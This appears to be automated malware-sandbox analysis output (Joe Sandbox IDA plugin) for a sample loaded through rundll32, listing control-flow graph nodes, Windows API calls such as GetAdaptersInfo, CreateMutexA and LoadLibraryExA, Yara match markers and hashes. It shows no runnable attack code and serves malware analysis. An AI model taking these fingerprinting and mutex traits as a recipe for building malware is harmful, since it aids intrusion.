4971->4972 4972->4966 4977 6c33de8e-6c33de95 4972->4977 4973->4974 4974->4957 4978 6c33ded5-6c33dee6 4974->4978 4976->4974 4977->4966 4980 6c33de97-6c33deac 4977->4980 4978->4957 4980->4974 4984->4985 5019 6c33e02e-6c33e04a 4984->5019 5002 6c33e102 4985->5002 5003 6c33e0fc-6c33e100 4985->5003 5002->4887 5003->5002 5005 6c33e107-6c33e120 5003->5005 5008 6c33e122-6c33e126 5005->5008 5009 6c33e128 5005->5009 5008->5009 5010 6c33e12d-6c33e148 5008->5010 5009->4887 5014 6c33e150 5010->5014 5015 6c33e14a-6c33e14e 5010->5015 5014->4887 5015->5014 5016 6c33e155-6c33e2d4 call 6c33d840 call 6c33d850 * 2 call 6c33d830 * 8 5015->5016 5043 6c33e2d6-6c33e2da 5016->5043 5044 6c33e2dc 5016->5044 5019->4985 5043->5044 5045 6c33e2e1-6c33e2fa 5043->5045 5044->4887 5047 6c33e302 5045->5047 5048 6c33e2fc-6c33e300 5045->5048 5047->4887 5048->5047 5049 6c33e307-6c33e320 5048->5049 5051 6c33e322-6c33e326 5049->5051 5052 6c33e328 5049->5052 5051->5052 5053 6c33e32d-6c33e346 5051->5053 5052->4887 5055 6c33e348-6c33e34c 5053->5055 5056 6c33e34e 5053->5056 5055->5056 5057 6c33e353-6c33e371 5055->5057 5056->4887 5059 6c33e373-6c33e377 5057->5059 5060 6c33e379 5057->5060 5059->5060 5061 6c33e37e-6c33e3fd call 6c33d0f0 5059->5061 5060->4887 5065 6c33e402-6c33e419 call 6c33d240 5061->5065 5065->4826 5065->4887
                                                                  APIs
                                                                  • CoInitializeSecurity.COMBASE(00000003,00000000,00000000,00000000), ref: 6C33D93E
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322575419.000000006C311000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C310000, based on PE: true
                                                                  • Associated: 00000005.00000002.3322561944.000000006C310000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322600793.000000006C34B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322617432.000000006C35A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322682909.000000006C56D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322765446.000000006C807000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322781439.000000006C808000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6c310000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeSecurity
                                                                  • String ID:
                                                                  • API String ID: 640775948-0
                                                                  • Opcode ID: 48e96af2b2bb871ea6e947be42ef3006692c1da543b6da71f7585006744613b1
                                                                  • Instruction ID: 8dd37d9b3fc70e12cd5d9a261c60797cc0a3f7a787a7de142ef2f81ae61fec9e
                                                                  • Opcode Fuzzy Hash: 48e96af2b2bb871ea6e947be42ef3006692c1da543b6da71f7585006744613b1
                                                                  • Instruction Fuzzy Hash: CB929DB4E10268DBDB04DFA4C841BEEB7B1AF48304F1081A9E50DAB791D775AE45CF62

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 5069 7fb2b260-7fb2b2db call 7fb40cc0 GetPEB 5072 7fb2b2e1-7fb2b33f 5069->5072 5073 7fb2b341-7fb2b34b 5072->5073 5074 7fb2b34d 5072->5074 5075 7fb2b357-7fb2b366 5073->5075 5074->5075 5076 7fb2b467-7fb2b497 5075->5076 5077 7fb2b36c-7fb2b372 5075->5077 5076->5072 5079 7fb2b49d 5076->5079 5078 7fb2b375-7fb2b38e 5077->5078 5078->5076 5081 7fb2b394-7fb2b3b8 5078->5081 5080 7fb2b4a7-7fb2b4ca GetAdaptersInfo 5079->5080 5082 7fb2b4d0-7fb2b5d1 call 7fb02380 call 7fb16d50 GetPEB 5080->5082 5083 7fb2b85e-7fb2b8e7 call 7fb037d0 call 7fb16a90 GetPEB 5080->5083 5084 7fb2b3c2-7fb2b3e2 5081->5084 5099 7fb2b5d7-7fb2b635 5082->5099 5098 7fb2b8ed-7fb2b94b 5083->5098 5086 7fb2b3f2-7fb2b409 5084->5086 5087 7fb2b3e4-7fb2b415 5084->5087 5086->5084 5093 7fb2b462 5087->5093 5094 7fb2b417-7fb2b460 5087->5094 5093->5078 5094->5080 5100 7fb2b959 5098->5100 5101 7fb2b94d-7fb2b957 5098->5101 5102 7fb2b643 5099->5102 5103 7fb2b637-7fb2b641 5099->5103 5104 7fb2b963-7fb2b972 5100->5104 5101->5104 5105 7fb2b64d-7fb2b65c 5102->5105 5103->5105 5106 7fb2ba73-7fb2baa3 5104->5106 5107 7fb2b978-7fb2b97e 5104->5107 5108 7fb2b662-7fb2b668 5105->5108 5109 7fb2b75d-7fb2b78d 5105->5109 5106->5098 5113 7fb2baa9 5106->5113 5111 7fb2b981-7fb2b99a 5107->5111 5112 7fb2b66b-7fb2b684 5108->5112 5109->5099 5110 7fb2b793 5109->5110 5115 7fb2b79d-7fb2b801 5110->5115 5111->5106 5116 7fb2b9a0-7fb2b9c4 5111->5116 5112->5109 5117 7fb2b68a-7fb2b6ae 5112->5117 5114 7fb2bab3-7fb2bb5a call 7fb00b70 call 7fb16b90 GetPEB 5113->5114 5140 7fb2bb60-7fb2bbca 5114->5140 5127 7fb2b807-7fb2b817 5115->5127 5118 7fb2b9ce-7fb2b9ee 5116->5118 5119 7fb2b6b8-7fb2b6d8 5117->5119 5122 7fb2b9f0-7fb2ba21 5118->5122 5123 7fb2b9fe-7fb2ba15 5118->5123 5124 7fb2b6da-7fb2b70b 5119->5124 5125 7fb2b6e8-7fb2b6ff 5119->5125 5134 7fb2ba23-7fb2ba6c 5122->5134 5135 7fb2ba6e 5122->5135 5123->5118 5130 7fb2b758 5124->5130 5131 7fb2b70d-7fb2b756 5124->5131 5125->5119 5127->5127 5133 7fb2b819-7fb2b859 call 7fb13290 5127->5133 5130->5112 5131->5115 5141 7fb2c15d-7fb2c160 5133->5141 5134->5114 5135->5111 5142 7fb2bbd8 5140->5142 5143 7fb2bbcc-7fb2bbd6 5140->5143 5144 7fb2bbe2-7fb2bbf1 5142->5144 5143->5144 5145 7fb2bbf7-7fb2bc00 5144->5145 5146 7fb2bd0d-7fb2bd3d 5144->5146 5148 7fb2bc03-7fb2bc1c 5145->5148 5146->5140 5147 7fb2bd43 5146->5147 5149 7fb2bd4d-7fb2bdf5 call 7faff940 call 7fb16d10 GetPEB 5147->5149 5148->5146 5150 7fb2bc22-7fb2bc4f 5148->5150 5162 7fb2bdfb-7fb2be59 5149->5162 5151 7fb2bc59-7fb2bc79 5150->5151 5153 7fb2bc7b-7fb2bcac 5151->5153 5154 7fb2bc89-7fb2bca0 5151->5154 5157 7fb2bd08 5153->5157 5158 7fb2bcae-7fb2bd06 5153->5158 5154->5151 5157->5148 5158->5149 5163 7fb2be67 5162->5163 5164 7fb2be5b-7fb2be65 5162->5164 5165 7fb2be71-7fb2be80 5163->5165 5164->5165 5166 7fb2bf81-7fb2bfb1 5165->5166 5167 7fb2be86-7fb2be8c 5165->5167 5166->5162 5169 7fb2bfb7 5166->5169 5168 7fb2be8f-7fb2bea8 5167->5168 5168->5166 5170 7fb2beae-7fb2bed2 5168->5170 5171 7fb2bfc1-7fb2c105 call 7faf1e70 call 7fafe1b0 call 7fb16510 call 7faf1c30 * 2 call 7fb01840 call 7fb164d0 call 7faf1c30 * 2 call 7fafb340 call 7fb16390 call 7faf1c30 call 7fb3e9e0 5169->5171 5172 7fb2bedc-7fb2befc 5170->5172 5211 7fb2c10b-7fb2c11b 5171->5211 5173 7fb2befe-7fb2bf2f 5172->5173 5174 7fb2bf0c-7fb2bf23 5172->5174 5179 7fb2bf31-7fb2bf7a 5173->5179 5180 7fb2bf7c 5173->5180 5174->5172 5179->5171 5180->5168 5211->5211 5212 7fb2c11d-7fb2c158 call 7fb13290 5211->5212 5212->5141
                                                                  APIs
                                                                  • GetAdaptersInfo.IPHLPAPI(?,?), ref: 7FB2B4B7
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AdaptersInfo
                                                                  • String ID:
                                                                  • API String ID: 3177971545-0
                                                                  • Opcode ID: 3175894915bbfa6033d4a4ee99438291a771d73e470008ae6b8e6fd5e3f3a2c0
                                                                  • Instruction ID: cbec1fbb35891e9af9bc30ab06d85996b57e24e075c7e68ac038b7d5a2220986
                                                                  • Opcode Fuzzy Hash: 3175894915bbfa6033d4a4ee99438291a771d73e470008ae6b8e6fd5e3f3a2c0
                                                                  • Instruction Fuzzy Hash: D5A28C74E052698FDB68CF58C894BDDBBB1BF89304F1081EAD849A7355DB30AA85CF50

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 5214 7fb27660-7fb27722 call 7fb030f0 call 7fb16610 call 7fb136a0 call 7fb26070 call 7fafa1a0 5226 7fb27724-7fb2772b 5214->5226 5227 7fb2772d 5214->5227 5228 7fb27734-7fb2773a 5226->5228 5227->5228 5229 7fb27740-7fb27766 call 7fb309b0 call 7fae44b0 5228->5229 5230 7fb27868-7fb278c7 call 7fb120f0 * 4 call 7fae45d0 call 7fb3b2a0 5228->5230 5239 7fb27863 5229->5239 5240 7fb2776c-7fb2785e call 7faf63a0 call 7fafacc0 call 7faed1f0 call 7fb15a00 call 7fb11690 call 7fb25ec0 call 7fae3160 call 7fafacc0 call 7faf9d60 call 7fb120f0 5229->5240 5259 7fb279e2-7fb27a52 call 7fb239c0 call 7fb11690 call 7fb25ec0 call 7fae2ff0 5230->5259 5260 7fb278cd-7fb279dd call 7faf63a0 call 7fae45d0 call 7fafa670 call 7faed1f0 call 7fb15a00 call 7fb11690 call 7fb25ec0 call 7fae3160 call 7fae45d0 call 7fafa670 call 7faf9d60 call 7fb120f0 5230->5260 5240->5239 5286 7fb27a58-7fb27a68 5259->5286 5286->5286 5289 7fb27a6a-7fb27b54 call 7fae5360 call 7fb120f0 call 7fae48d0 call 7faf9e20 call 7fb120f0 call 7faf63a0 * 3 call 7fb34390 5286->5289 5322 7fb27b59-7fb27b79 5289->5322 5323 7fb27bc5-7fb27c3e call 7faf63a0 * 2 call 7fae2ff0 5322->5323 5324 7fb27b7b-7fb27bbf call 7fafc2e0 call 7fb16150 call 7fb11690 call 7faf1cf0 5322->5324 5338 7fb27c44-7fb27c54 5323->5338 5324->5323 5344 7fb2843d-7fb284ef call 7faf63a0 * 2 call 7fb172d0 call 7fb120f0 * 4 call 7fb13200 call 7fb17680 call 7fb120f0 5324->5344 5338->5338 5340 7fb27c56-7fb27cc7 call 7fae5360 call 7fb34390 5338->5340 5348 7fb27d13-7fb27d85 call 7faf63a0 * 2 call 7fae2ff0 5340->5348 5349 7fb27cc9-7fb27d0d call 7fb019e0 call 7fb16010 call 7fb11690 call 7faf1cf0 5340->5349 5412 7fb284f2-7fb284ff 5344->5412 5370 7fb27d8b-7fb27d9b 5348->5370 5349->5348 5382 7fb28374-7fb28438 call 7faf63a0 * 2 call 7fb172d0 call 7fb120f0 * 5 call 7fb13200 call 7fb17680 call 7fb120f0 5349->5382 5370->5370 5373 7fb27d9d-7fb27e0b call 7fae5360 call 7fb34390 5370->5373 5388 7fb27e57-7fb27ed6 call 7faf63a0 * 2 call 7fae2ff0 5373->5388 5389 7fb27e0d-7fb27e51 call 7fafd3a0 call 7fb16050 call 7fb11690 call 7faf1cf0 5373->5389 5382->5412 5416 7fb27edc-7fb27eec 5388->5416 5389->5388 5425 7fb2829c-7fb2836f call 7faf63a0 * 2 call 7fb172d0 call 7fb120f0 * 6 call 7fb13200 call 7fb17680 call 7fb120f0 5389->5425 5416->5416 5419 7fb27eee-7fb27f62 call 7fae5360 call 7fb34390 5416->5419 5432 7fb27fb7-7fb27ffe GetPEB 5419->5432 5433 7fb27f64-7fb27fb1 call 7fafe9d0 call 7fb161d0 call 7fb11690 call 7faf1cf0 5419->5433 5425->5412 5438 7fb28001-7fb2805c 5432->5438 5433->5432 5471 7fb281b5-7fb28297 call 7faf63a0 * 2 call 7fb172d0 call 7fb120f0 * 7 call 7fb13200 call 7fb17680 call 7fb120f0 5433->5471 5442 7fb2806a 5438->5442 5443 7fb2805e-7fb28068 5438->5443 5444 7fb28074-7fb28083 5442->5444 5443->5444 5448 7fb28089-7fb2808f 5444->5448 5449 7fb2816c-7fb28196 5444->5449 5454 7fb28092-7fb280ab 5448->5454 5449->5438 5457 7fb2819c 5449->5457 5454->5449 5459 7fb280b1-7fb280d2 5454->5459 5462 7fb281a6-7fb281ae 5457->5462 5464 7fb280d9-7fb280f0 5459->5464 5462->5471 5468 7fb280f2-7fb2811a 5464->5468 5469 7fb280fd-7fb2810e 5464->5469 5477 7fb28167 5468->5477 5478 7fb2811c-7fb28165 5468->5478 5469->5464 5471->5412 5477->5454 5478->5462
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: "
                                                                  • API String ID: 0-123907689
                                                                  • Opcode ID: 5e02f1ae2c5062c1ded0563556259fd546fcce1e82a3b4908e501870b8c4357e
                                                                  • Instruction ID: ff41edaeb76aed7f8f00340798bd7d4010a934d6a26c030eb69619d4d2677efc
                                                                  • Opcode Fuzzy Hash: 5e02f1ae2c5062c1ded0563556259fd546fcce1e82a3b4908e501870b8c4357e
                                                                  • Instruction Fuzzy Hash: C7A233B0D04258CBCB14DFA8D994BDEBBB5AF49304F1082D9D409A7295EB346B84DF91

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 5516 7fb14392-7fb143d8 GetPEB 5518 7fb143de-7fb1443c 5516->5518 5519 7fb1444a 5518->5519 5520 7fb1443e-7fb14448 5518->5520 5521 7fb14454-7fb14463 5519->5521 5520->5521 5522 7fb14564-7fb14594 5521->5522 5523 7fb14469-7fb1446f 5521->5523 5522->5518 5525 7fb1459a 5522->5525 5524 7fb14472-7fb1448b 5523->5524 5524->5522 5527 7fb14491-7fb144b5 5524->5527 5526 7fb145a4-7fb145b3 PathIsDirectoryW 5525->5526 5528 7fb14d07-7fb14d19 5526->5528 5529 7fb145b9-7fb145e2 call 7fb28fa0 5526->5529 5530 7fb144bf-7fb144df 5527->5530 5534 7fb14d1b-7fb14d21 5528->5534 5537 7fb145e4-7fb145fa 5529->5537 5538 7fb145fc-7fb14606 5529->5538 5532 7fb144e1-7fb14512 5530->5532 5533 7fb144ef-7fb14506 5530->5533 5539 7fb14514-7fb1455d 5532->5539 5540 7fb1455f 5532->5540 5533->5530 5541 7fb14624-7fb1466a 5537->5541 5538->5541 5542 7fb14608-7fb1460e 5538->5542 5539->5526 5540->5524 5544 7fb14670-7fb1467c 5541->5544 5545 7fb147db-7fb14855 LoadLibraryExA 5541->5545 5542->5541 5543 7fb14610-7fb1461d 5542->5543 5543->5541 5544->5545 5546 7fb14682-7fb146bd 5544->5546 5547 7fb14863 5545->5547 5548 7fb14857-7fb14861 5545->5548 5546->5545 5549 7fb146c3-7fb146cf 5546->5549 5550 7fb1486d-7fb14877 5547->5550 5548->5550 5549->5545 5553 7fb146d5-7fb146df 5549->5553 5551 7fb14885 5550->5551 5552 7fb14879-7fb14883 5550->5552 5554 7fb1488f-7fb1489b 5551->5554 5552->5554 5555 7fb146f0-7fb146fa 5553->5555 5556 7fb148a1-7fb148de call 7fb29280 5554->5556 5557 7fb149a3-7fb149aa 5554->5557 5558 7fb14700-7fb1471a 5555->5558 5559 7fb147bf 5555->5559 5574 7fb14965-7fb1496c 5556->5574 5575 7fb148e4 5556->5575 5562 7fb149b0-7fb14a33 call 7fb40b50 5557->5562 5563 7fb14a6c-7fb14abe 5557->5563 5560 7fb14735 5558->5560 5561 7fb1471c 5558->5561 5559->5545 5567 7fb1473f-7fb14746 5560->5567 5565 7fb14729-7fb14733 5561->5565 5566 7fb1471e-7fb14727 5561->5566 5578 7fb14a35-7fb14a47 5562->5578 5579 7fb14a49-7fb14a4c 5562->5579 5563->5528 5570 7fb14ac4-7fb14adb 5563->5570 5565->5567 5566->5560 5566->5565 5571 7fb14754 5567->5571 5572 7fb14748-7fb14752 5567->5572 5576 7fb14ae1-7fb14b25 call 7fb28c80 5570->5576 5577 7fb1475e-7fb1476a 5571->5577 5572->5577 5583 7fb1499e 5574->5583 5584 7fb1496e-7fb14975 5574->5584 5580 7fb148e6-7fb148ea 5575->5580 5581 7fb148ec-7fb148f2 5575->5581 5594 7fb14b33 5576->5594 5595 7fb14b27-7fb14b31 5576->5595 5586 7fb147a1-7fb147ac 5577->5586 5587 7fb1476c-7fb1479f 5577->5587 5585 7fb14a54-7fb14a66 5578->5585 5579->5585 5580->5574 5580->5581 5588 7fb148f4-7fb14925 5581->5588 5589 7fb14927-7fb14960 5581->5589 5583->5563 5584->5583 5591 7fb14977-7fb14998 call 7fb40b50 5584->5591 5585->5563 5592 7fb147b1-7fb147ba 5586->5592 5587->5592 5593 7fb14963 5588->5593 5589->5593 5591->5583 5592->5555 5593->5583 5597 7fb14b3d-7fb14b43 5594->5597 5595->5597 5600 7fb14b45-7fb14b69 5597->5600 5601 7fb14b77 5597->5601 5600->5601 5602 7fb14b6b-7fb14b75 5600->5602 5603 7fb14b81-7fb14b8d 5601->5603 5602->5603 5604 7fb14bc4-7fb14bcd 5603->5604 5605 7fb14b8f-7fb14b9c 5603->5605 5608 7fb14bd7-7fb14bdc 5604->5608 5609 7fb14bcf-7fb14bd5 5604->5609 5606 7fb14be7-7fb14bee 5605->5606 5607 7fb14b9e-7fb14bc2 5605->5607 5611 7fb14bf0-7fb14c0d 5606->5611 5612 7fb14c0f-7fb14c15 5606->5612 5607->5604 5607->5606 5610 7fb14bdf-7fb14be5 5608->5610 5609->5610 5613 7fb14c5d-7fb14c76 5610->5613 5611->5613 5614 7fb14c17-7fb14c1e 5612->5614 5615 7fb14c2c 5612->5615 5613->5576 5617 7fb14c7c-7fb14cd4 call 7fb40b50 5613->5617 5614->5615 5618 7fb14c20-7fb14c2a 5614->5618 5616 7fb14c36-7fb14c45 5615->5616 5619 7fb14c53 5616->5619 5620 7fb14c47-7fb14c51 5616->5620 5623 7fb14ce2 5617->5623 5624 7fb14cd6-7fb14ce0 5617->5624 5618->5616 5619->5613 5620->5613 5625 7fb14cec-7fb14d05 5623->5625 5624->5625 5625->5534
                                                                  APIs
                                                                  • PathIsDirectoryW.SHLWAPI(?), ref: 7FB145AB
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DirectoryPath
                                                                  • String ID:
                                                                  • API String ID: 1580926078-0
                                                                  • Opcode ID: ffefbfc2f7be68a54c4a2bb288fe2143652917f9296570af280619f41e5c650f
                                                                  • Instruction ID: 4106c5529ef19be14ed9b82acacfac91a52b1a314cca411a3adb549c39e2b9bf
                                                                  • Opcode Fuzzy Hash: ffefbfc2f7be68a54c4a2bb288fe2143652917f9296570af280619f41e5c650f
                                                                  • Instruction Fuzzy Hash: 39B1E374E05269CBDB25CF59C894BADBBB2BF49300F2482DAD419A7345E730AE81CF54
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __aullrem
                                                                  • String ID:
                                                                  • API String ID: 3758378126-0
                                                                  • Opcode ID: 333805c333324a30ec8c619177b6423aa11cc638e889806f90645f3f4482f82b
                                                                  • Instruction ID: f6c0c2f88aa6364876ea21c47821a4d815bd4c22f7ca0519062792e8657fbbe9
                                                                  • Opcode Fuzzy Hash: 333805c333324a30ec8c619177b6423aa11cc638e889806f90645f3f4482f82b
                                                                  • Instruction Fuzzy Hash: 8F91C474E052688FDB64CF69C890B99B7B1FF89304F2481DAD80DA7356D731AA85CF50
                                                                  APIs
                                                                  • GetSystemInfo.KERNEL32(?), ref: 7FB2AF47
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InfoSystem
                                                                  • String ID:
                                                                  • API String ID: 31276548-0
                                                                  • Opcode ID: 0799e872704a2c02d3917b2289854fd93e3ac26d7fb6a869771213d8eff4452c
                                                                  • Instruction ID: 15e8bccdd9c89269a5e750c92c9140f77411790266a6f5573f0bbc0012576cc5
                                                                  • Opcode Fuzzy Hash: 0799e872704a2c02d3917b2289854fd93e3ac26d7fb6a869771213d8eff4452c
                                                                  • Instruction Fuzzy Hash: B1619EB8E042599FCB04CF98D590AEDFBF5BF48314F24819AD819AB345D734AA42CF54

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2137 7fb077a0-7fb079a0 2138 7fb079a6-7fb079a9 2137->2138 2139 7fb07a3f-7fb07a54 CreateMutexA 2137->2139 2142 7fb079b0-7fb079d0 2138->2142 2143 7fb07a00-7fb07a12 2138->2143 2144 7fb079d2-7fb079d8 2138->2144 2145 7fb07a14-7fb07a39 2138->2145 2140 7fb07b44-7fb07b4f GetLastError 2139->2140 2141 7fb07a5a-7fb07ab3 call 7fb28fa0 2139->2141 2147 7fb07ce0-7fb07cf3 2140->2147 2148 7fb07b55-7fb07bd2 call 7fb40b50 2140->2148 2155 7fb07ab5 2141->2155 2156 7fb07ac9 2141->2156 2142->2139 2143->2139 2149 7fb079da-7fb079eb 2144->2149 2150 7fb079ed-7fb079f5 2144->2150 2145->2139 2153 7fb07cf8-7fb07cfc 2147->2153 2160 7fb07bd4-7fb07bd8 2148->2160 2161 7fb07be9-7fb07c02 2148->2161 2154 7fb079f8-7fb079fe 2149->2154 2150->2154 2154->2139 2158 7fb07ac0-7fb07ac7 2155->2158 2159 7fb07ab7-7fb07abe 2155->2159 2162 7fb07ad0-7fb07ae9 2156->2162 2158->2162 2159->2156 2159->2158 2163 7fb07c07-7fb07c0b 2160->2163 2164 7fb07bda-7fb07bde 2160->2164 2167 7fb07cb6-7fb07cde CloseHandle 2161->2167 2165 7fb07aeb 2162->2165 2166 7fb07aff 2162->2166 2172 7fb07c16 2163->2172 2173 7fb07c0d-7fb07c14 2163->2173 2168 7fb07be4 2164->2168 2169 7fb07c9f-7fb07cb3 2164->2169 2170 7fb07af6-7fb07afd 2165->2170 2171 7fb07aed-7fb07af4 2165->2171 2174 7fb07b06-7fb07b0c 2166->2174 2167->2153 2168->2167 2169->2167 2170->2174 2171->2166 2171->2170 2175 7fb07c1d-7fb07c26 2172->2175 2173->2175 2176 7fb07b3d-7fb07b3f 2174->2176 2177 7fb07b0e-7fb07b3a call 7fb40b50 2174->2177 2178 7fb07c31 2175->2178 2179 7fb07c28-7fb07c2f 2175->2179 2176->2153 2177->2176 2181 7fb07c38-7fb07c3e 2178->2181 2179->2181 2183 7fb07c40-7fb07c47 2181->2183 2184 7fb07c49 2181->2184 2185 7fb07c50-7fb07c59 2183->2185 2184->2185 2186 7fb07c5b-7fb07c6d 2185->2186 2187 7fb07c6f-7fb07c72 2185->2187 2188 7fb07c7a-7fb07c9d 2186->2188 2187->2188 2188->2167
                                                                  APIs
                                                                  • CreateMutexA.KERNEL32(00000000,00000001,?), ref: 7FB07A47
                                                                  • GetLastError.KERNEL32 ref: 7FB07B44
                                                                  • CloseHandle.KERNEL32(00000000,6FA9D62B,?,?,?), ref: 7FB07CBA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseCreateErrorHandleLastMutex
                                                                  • String ID: *$9mD$B$u${
                                                                  • API String ID: 4294037311-4130828584
                                                                  • Opcode ID: 537e09cac54366d98d8a806f14c75329869821f3abebc8478ab471b4067c873d
                                                                  • Instruction ID: 8ed7f2569b1af6deaee40e2e236d34f996d731ab6ef0bb5dd7bd8193c88d7c10
                                                                  • Opcode Fuzzy Hash: 537e09cac54366d98d8a806f14c75329869821f3abebc8478ab471b4067c873d
                                                                  • Instruction Fuzzy Hash: AAF14AB5D14258DFDB24CFAAD8807ADBBF1FB48310F2481AAD459A7350D7349A82CF61
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 7FB3CCEE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DirectorySystem
                                                                  • String ID: )$2$?$m$n $e
                                                                  • API String ID: 2188284642-1749247282
                                                                  • Opcode ID: db30e5fb1f8a4c8d3ea49101ea524360cf1fddd3bae898005d86f1154f5837a4
                                                                  • Instruction ID: 14db01ebf027045925d14701e6810f31702e8a12c3736ba74facc8438137c623
                                                                  • Opcode Fuzzy Hash: db30e5fb1f8a4c8d3ea49101ea524360cf1fddd3bae898005d86f1154f5837a4
                                                                  • Instruction Fuzzy Hash: B9F13875D04668CBDB25CF66C8847ADBBF1FF49310F2480DAD049A7290E774AA85CF61

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 4021 7fb29280-7fb29495 call 7fb295f0 4024 7fb294a1-7fb294ab 4021->4024 4025 7fb29497-7fb2949d GetShellWindow 4021->4025 4026 7fb294c0-7fb294ec call 7fb40b50 4024->4026 4027 7fb294ad-7fb294be 4024->4027 4025->4024 4033 7fb294f7 4026->4033 4034 7fb294ee-7fb294f5 4026->4034 4028 7fb2950e-7fb29526 4027->4028 4031 7fb29536-7fb29539 4028->4031 4032 7fb29528-7fb29534 4028->4032 4035 7fb2953e-7fb2956d 4031->4035 4032->4035 4036 7fb294fe-7fb29507 4033->4036 4034->4036 4037 7fb29578 4035->4037 4038 7fb2956f-7fb29576 4035->4038 4036->4028 4039 7fb2957f-7fb29585 4037->4039 4038->4039 4040 7fb29590 4039->4040 4041 7fb29587-7fb2958e 4039->4041 4042 7fb29597-7fb295ea 4040->4042 4041->4042
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ShellWindow
                                                                  • String ID: 2$MNo name attribute $Q$\$c
                                                                  • API String ID: 2831631499-3960561890
                                                                  • Opcode ID: 1116c3cb1f449050573dab74950021e868401f4132b2afd9e55508b76645d207
                                                                  • Instruction ID: 619a8afa027a82919139412aac6fa3758930aab5db9d89f87e44bdacc70a57a8
                                                                  • Opcode Fuzzy Hash: 1116c3cb1f449050573dab74950021e868401f4132b2afd9e55508b76645d207
                                                                  • Instruction Fuzzy Hash: DDA14879D04358CEDB24CFAAC4807ADBBF1BF49310F24819AD449A7341D7349A46CF61

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
